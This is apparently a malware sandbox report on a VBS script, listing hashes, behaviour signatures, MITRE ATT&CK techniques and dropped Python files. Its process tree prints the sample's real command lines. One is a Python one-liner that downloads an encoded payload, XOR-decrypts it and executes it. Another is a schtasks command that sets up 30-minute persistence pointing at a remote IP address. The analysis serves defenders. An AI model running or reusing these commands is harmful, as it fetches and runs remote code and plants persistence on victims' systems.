5d4093e81963e6499eb17c01029f9c8d543c7b842a5405441351453acbd715e8

Analysis

max time kernel
94s
max time network
96s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
04-06-2024 03:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4f1f6b38616ce2f8c0b63b47aec5a614ec62d6ba66e8d31d61d26e3416f8e38d.vbs
Size

6KB
MD5

b0880a1b5d48b2c00faf73348e033026
SHA1

9e1433caf796fcd191fb3a1214e36aae7985318e
SHA256

4f1f6b38616ce2f8c0b63b47aec5a614ec62d6ba66e8d31d61d26e3416f8e38d
SHA512

ea2fa6026b30158dfd58a61b236d3473e9c601807117593d81e21c6f6e9d2026217c2c093b3647a5d93625d60e9d8bd98c7038080283945217b58c3b1024c5ed
SSDEEP

96:Ww/IRkcyXoAxpqzpZNPAOPEL3iM4N2FMUCndSZKVmwGC4xXxpZFd0V:XukPHxpq9ZN4OMDi5HnQA8XxJd0V

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	4344	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
1956	python.exe

Loads dropped DLL 13 IoCs

pid	Process
1956	python.exe
1956	python.exe
1956	python.exe
1956	python.exe
1956	python.exe
1956	python.exe
1956	python.exe
1956	python.exe
1956	python.exe
1956	python.exe
1956	python.exe
1956	python.exe
1956	python.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3660	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4344 wrote to memory of 1956	4344	WScript.exe	85
PID 4344 wrote to memory of 1956	4344	WScript.exe	85
PID 4344 wrote to memory of 3660	4344	WScript.exe	89
PID 4344 wrote to memory of 3660	4344	WScript.exe	89

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4f1f6b38616ce2f8c0b63b47aec5a614ec62d6ba66e8d31d61d26e3416f8e38d.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:4344
- C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\python.exe
  "C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\python.exe" -c "import urllib.request; import sys; url=sys.argv[1]; passphrase=sys.argv[2]; response=urllib.request.urlopen(url); encoded_data=response.read().decode('utf-8'); key=(passphrase * (32 // len(passphrase) + 1))[:32]; decrypted_script=''.join([chr(int(encoded_data[i:i+2], 16) ^ ord(key[(i//2) % len(key)])) for i in range(0, len(encoded_data), 2)]); exec(decrypted_script)" "http://google.com/out.txt" "hssjk8w8028jaksjsajdad"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1956
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /tn KfSVinHZluSFuQJl /tr "C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\python.exe \\172.86.98.166@80\Downloads\Document.txt" /SC MINUTE /MO 30
  2⤵
  - Creates scheduled task(s)
  PID:3660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\_bz2.pyd

Filesize
82KB

MD5
b657287b413ef3787a0612b90485271e

SHA1
733b77be16f202215698d52defb233487c68e338

SHA256
ac091148ac7872ca82f09505b42652257bfdcb158eeb283b3748d8670efa5cca

SHA512
0069c46d309807ffe3669216983000e903bf53e1d778b76d6719da6d859749cf324316d329a113f3bda4bd90aa331e25c4a151309baa35095b7e92a9a630aa01

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\_hashlib.pyd

Filesize
62KB

MD5
107946577d4bf9322728f7d6650dc545

SHA1
5b668da623d9319f0358c81573b1da1e545d30bc

SHA256
ba7c0fa24779f32aff3ce7e7263dedb3b015cec09c471f5a09c18ac7d33460df

SHA512
73259518361d94c1752e5772f3c9b254d855da1089136770d4b07b242ab7aed218c9b15f0ff820b0ad58cf16ecc6caf9e444c42fff5f7a5752d9bbc4ecc9be36

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\_lzma.pyd

Filesize
155KB

MD5
a622fd60718cf8dbf9dce8944067bc5e

SHA1
7f8cf1349c4cca53f46ea98ba775115d0810c69d

SHA256
338fe691e5eb3620f93b2c1d138d6ffbb491317f78e030763cd12224e52d6fbc

SHA512
01a03ab8227fac52500295ca2d446c02a51a43f8f4f01ff4865ff2fbf3d25c90d8045f7cf386f69c2dd0abe38bd18545a62303292cfe181866f8648a7309afe9

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\_socket.pyd

Filesize
82KB

MD5
c6737d90f38aeb2ce99ed4cfbee58b60

SHA1
ab9066b111d98ac8a0bea80f83c971e3091e2be2

SHA256
d1930a929bac5052b5070d8f91a3b5e3aca7fcf18996d4308cf383803604bd25

SHA512
7e6db428993dadd641522eff416778ef0628f4c1fee8d267f4d4d864c690f95527ac017d290a03abc6e3d8556cb582f462b47b95dc11c0b9c5ba69ab3b8e5225

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\_ssl.pyd

Filesize
177KB

MD5
1263e4678d84189e16bfe9763165bd7e

SHA1
486fa90856edb1b7e8cc0b7c48da3e55c94c2bad

SHA256
6713a1b880d30f22d31b52e048d33ba62363aa0e814c80b258d4e344fa3d1fc6

SHA512
d2c0614d2ef7fe3e4b1eaefa81446920719729967c60ede9cc95b944ea6785a47e9ec41faa6e296e70ab8b8b9f58c40cbc29f58aa3b92de6676835a23813e1b3

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\libcrypto-3.dll

Filesize
5.0MB

MD5
e547cf6d296a88f5b1c352c116df7c0c

SHA1
cafa14e0367f7c13ad140fd556f10f320a039783

SHA256
05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de

SHA512
9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\libssl-3.dll

Filesize
768KB

MD5
19a2aba25456181d5fb572d88ac0e73e

SHA1
656ca8cdfc9c3a6379536e2027e93408851483db

SHA256
2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006

SHA512
df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\python.exe

Filesize
100KB

MD5
20e1d8cef6caad4ed31b57ae5007996b

SHA1
db432edcacc499ba5ebb3b112026fcf03bebd245

SHA256
a1f86747c7650ea810ab00252ee4986934d6c35e562f00910e0de0e5e6b244f4

SHA512
0fd6bd4998428c574a0702c8e6663f22a6d5a8487a8b11406c50ad777378fc4f58780b7bc9b666a6959e6fd4cc3c3c58b146d16847450547eb920ceb443e160d

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\python.zip

Filesize
11.9MB

MD5
17529ad56f7dac8ec72dd7fb2f0a62cf

SHA1
d8203d85bf5dbfd133e208decc0a6fd52da00dfb

SHA256
5fa8ee810fb436c9343f47f082aac1813d52b252af358709d8f4a6302c40ca97

SHA512
cd90690cd2e1c90dd742eeed9d2e4f6ff5a8c8bfe4c5ea6ef6b88e26b8a04dcb481acbda44b9e839664d5e1742a652dedc5e5fca4846fcc193e7202e056b0ba8

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\python3.DLL

Filesize
68KB

MD5
07869586cde01564c06bfd6e761eb9d0

SHA1
3522b0e9f1d90de7d0fe38fd2a4edb2a86b81bf9

SHA256
7286ef3b3fedb2eebce4de65edae6b7de673d33c89a26b19b922793fd6965851

SHA512
47a21af9ee780e6af78b2f744cd06d17236a393feac7db0112bb6e6e05baccc89c3bc9bd337eace83d038b917a2c47833b5acf2055dfb497da26d7e9b2df5c17

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\python313._pth

Filesize
80B

MD5
c23ad35e55e5b1a71ee2e9dd97723749

SHA1
3c5332fcf5e31d3c84fcba3eb722d4c36a1802cf

SHA256
35ddf94682ff9aa713a8d63557242ad00f3f28fdd39337f02c3bda4c0f791577

SHA512
9fd07332911783ff9d534d952eb8cfece7cbeb1934a34da2ab5274d671c38bdbc75e491b3bcac332dd882310c243f389ac6dc7c0eb80e9c0131dff2244e3ad73

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\python313.dll

Filesize
5.7MB

MD5
7de2a962cba9aa4001ce7c7b69ea8733

SHA1
8eebfc43a36c9c33d58b69bbc804e3cd454a816f

SHA256
b5e38a5b75445ab7cb2793bf314ff956d01d8fa1c9a6a37260bb1dfda567fc7b

SHA512
09f2de2de0f3e47bc0c181903c4ffdad39155a2af8a4fe047d292f4fb427fb7b5952d05e3a3b2517b2a7787d1680ea45aac56ba33a4c17cf2f53d9a006720fba

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\python313.zip

Filesize
3.6MB

MD5
67ff4452a364c0926b2acaa841194621

SHA1
018988419dea795c4b69e836143f350231a6327c

SHA256
e990d16eb365b9ad0e69da5980f349610a2a15749205a3143b0d7bd0be98d0dd

SHA512
eed3ac9de90d83f341b30b1ffdf9fe91214281d1e08f28dcdd0ec6759d53a503723845832963aaa44505ba006c024c8df941131d5c3d2a094ebabc749e784b71

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\select.pyd

Filesize
29KB

MD5
87e06d4de4d6528853c404d1dd95e583

SHA1
78de9d693ca267115db440a08dd4235d49b468c2

SHA256
29c6db9bd773ffac0586bcf4a5f6fd8b8a6cfd0a6abc18c8adf2f304175b9751

SHA512
0117c7f9b1f354c55855577703915e057ad799d5c4d5c8dc5a4bd1cdc969bb077e56385c66a067b8c64de424f8b89a33b185980f8c9e24ba52fd2884e979beaf

Download Submit
C:\Users\Admin\AppData\Roaming\jJjXIpEvRzYuWuoNye\unicodedata.pyd

Filesize
692KB

MD5
81e24cf708ef451b27aba4888b92e677

SHA1
2b99d8a31c8993dae4a202ceb3acbaa3f3722a3a

SHA256
9482a49e76e848ebfecf1e01fafbece3328846b31ebaccaf19167f7aa89a3903

SHA512
8a9f8da7658b840d942022f666e9aefb7dd22ec0688a39bbc456ef9cab20fb5104497b6c908aaeb70faae9be28cf22c8d78f7770a1e6808e6e65f268fe301376

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads